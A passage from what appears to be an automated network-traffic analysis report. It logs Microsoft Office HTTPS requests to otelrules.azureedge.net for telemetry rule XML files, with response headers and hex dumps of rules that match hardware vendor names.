                                                                                                                                                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                    x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120821Z-16849878b78p8hrf1se7fucxk800000007b000000000afzv
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    21192.168.2.54974113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                    x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120821Z-16849878b78wv88bk51myq5vxc00000006ug000000005rqp
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    22192.168.2.54974513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 632
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                    x-ms-request-id: 8abc48b9-201e-0096-2f4f-28ace6000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120821Z-15b8d89586fpccrmgpemqdqe5800000001e0000000003ctc
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    23192.168.2.54974313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                    x-ms-request-id: b99e46b1-a01e-001e-0499-2549ef000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120821Z-15b8d89586fqj7k5h9gbd8vs9800000007k000000000a7aw
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    24192.168.2.54974913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                    x-ms-request-id: cb18986a-b01e-0053-40f0-27cdf8000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120822Z-r197bdfb6b48v72xb403uy6hns00000007500000000030yf
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    25192.168.2.54974713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                    x-ms-request-id: 8384fc49-f01e-00aa-06d4-268521000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120822Z-17c5cb586f6mkpfkkpsf1dpups00000001wg000000002rv8
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    26192.168.2.54974813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                    x-ms-request-id: 962f3e82-b01e-0070-52cb-261cc0000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120822Z-r197bdfb6b4skzzvqpzzd3xetg00000005v00000000073c6
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    27192.168.2.54975013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                    x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120822Z-16849878b78z2wx67pvzz63kdg000000050g00000000ffv7
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    28192.168.2.54975113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                    x-ms-request-id: abb1733e-f01e-005d-6a3c-2813ba000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120822Z-15b8d89586ffsjj9qb0gmb1stn0000000ap0000000007w9r
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:22 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    29192.168.2.54975213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:23 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 469
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                    x-ms-request-id: 1ff5e4cc-601e-0001-30ce-25faeb000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120823Z-15b8d89586f42m673h1quuee4s0000000amg0000000044ns
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
